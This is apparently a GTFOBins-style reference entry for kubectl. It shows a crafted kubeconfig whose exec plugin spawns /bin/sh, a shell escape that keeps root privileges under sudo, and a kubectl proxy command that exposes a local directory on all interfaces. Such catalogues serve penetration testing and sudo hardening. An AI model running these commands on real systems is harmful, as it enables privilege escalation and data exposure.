This executable can spawn an interactive system shell.
This function can be performed by any unprivileged user.
cat >/path/to/temp-file <<EOF
clusters:
- cluster:
server: https://x
name: x
contexts:
- context:
cluster: x
user: x
name: x
current-context: x
users:
- name: x
user:
exec:
apiVersion: client.authentication.k8s.io/v1
interactiveMode: Always
command: /bin/sh
args:
- '-c'
- '/bin/sh 0<&2 1>&2'
EOF
kubectl get pods --kubeconfig=/path/to/temp-fileThis function is performed by the privileged user if executed via sudo because the acquired privileges are not dropped.
cat >/path/to/temp-file <<EOF
clusters:
- cluster:
server: https://x
name: x
contexts:
- context:
cluster: x
user: x
name: x
current-context: x
users:
- name: x
user:
exec:
apiVersion: client.authentication.k8s.io/v1
interactiveMode: Always
command: /bin/sh
args:
- '-c'
- '/bin/sh 0<&2 1>&2'
EOF
kubectl get pods --kubeconfig=/path/to/temp-fileThis executable can upload local data.
This function can be performed by any unprivileged user.
kubectl proxy --address=0.0.0.0 --port=12345 --www=/path/to/dir/ --www-prefix=/x/This function is performed by the privileged user if executed via sudo because the acquired privileges are not dropped.
kubectl proxy --address=0.0.0.0 --port=12345 --www=/path/to/dir/ --www-prefix=/x/This function is performed by the privileged user if the executable has the SUID bit set and the right ownership because the effective privileges are not dropped.
kubectl proxy --address=0.0.0.0 --port=12345 --www=/path/to/dir/ --www-prefix=/x/